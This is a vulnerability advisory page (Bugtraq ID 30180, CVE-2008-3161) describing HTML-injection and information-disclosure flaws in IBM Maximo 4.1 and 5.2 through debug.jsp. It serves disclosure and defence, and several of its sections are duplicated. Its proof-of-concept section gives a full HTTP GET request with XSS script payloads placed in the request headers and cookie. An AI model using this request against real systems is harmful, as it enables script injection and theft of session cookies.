IBM Maximo 'debug.jsp' HTML Injection And Information Disclosure Vulnerabilities
BID:30180
Info
IBM Maximo 'debug.jsp' HTML Injection And Information Disclosure Vulnerabilities
| Bugtraq ID: | 30180 |
| Class: | Unknown |
| CVE: |
CVE-2008-3161 |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 11 2008 12:00AM |
| Updated: | May 07 2015 05:27PM |
| Credit: | Deniz Cevik |
| Vulnerable: |
IBM Maximo 5.2 IBM Maximo 4.1 |
| Not Vulnerable: | |
Discussion
IBM Maximo 'debug.jsp' HTML Injection And Information Disclosure Vulnerabilities
IBM Maximo is prone to multiple HTML-injection vulnerabilities and an information-disclosure vulnerability.
An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. Code execution may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Information obtained may aid in further attacks.
These issues affect IBM Maximo 4.1 and 5.2; other versions may also be vulnerable.
IBM Maximo is prone to multiple HTML-injection vulnerabilities and an information-disclosure vulnerability.
An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. Code execution may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Information obtained may aid in further attacks.
These issues affect IBM Maximo 4.1 and 5.2; other versions may also be vulnerable.
Exploit / POC
IBM Maximo 'debug.jsp' HTML Injection And Information Disclosure Vulnerabilities
Attackers can exploit these issues by using a browser or standard tools.
The following proof-of-concept HTTP GET request is available for the information-disclosure issue:
GET /jsp/common/system/debug.jsp HTTP/1.1
Accept: <script>alert('XSS');</script>
Accept-Language: <script>alert('XSS');</script>
UA-CPU: <script>alert('XSS');</script>
Accept-Encoding: <script>alert('XSS');</script>
User-Agent: <script>alert('XSS');</script>
Host: maximo
Connection: Keep-Alive
Cookie: <script>alert('XSS');</script>
Attackers can exploit these issues by using a browser or standard tools.
The following proof-of-concept HTTP GET request is available for the information-disclosure issue:
GET /jsp/common/system/debug.jsp HTTP/1.1
Accept: <script>alert('XSS');</script>
Accept-Language: <script>alert('XSS');</script>
UA-CPU: <script>alert('XSS');</script>
Accept-Encoding: <script>alert('XSS');</script>
User-Agent: <script>alert('XSS');</script>
Host: maximo
Connection: Keep-Alive
Cookie: <script>alert('XSS');</script>
Solution / Fix
IBM Maximo 'debug.jsp' HTML Injection And Information Disclosure Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
IBM Maximo 'debug.jsp' HTML Injection And Information Disclosure Vulnerabilities
References:
References:
- IBM Maximo Products (IBM)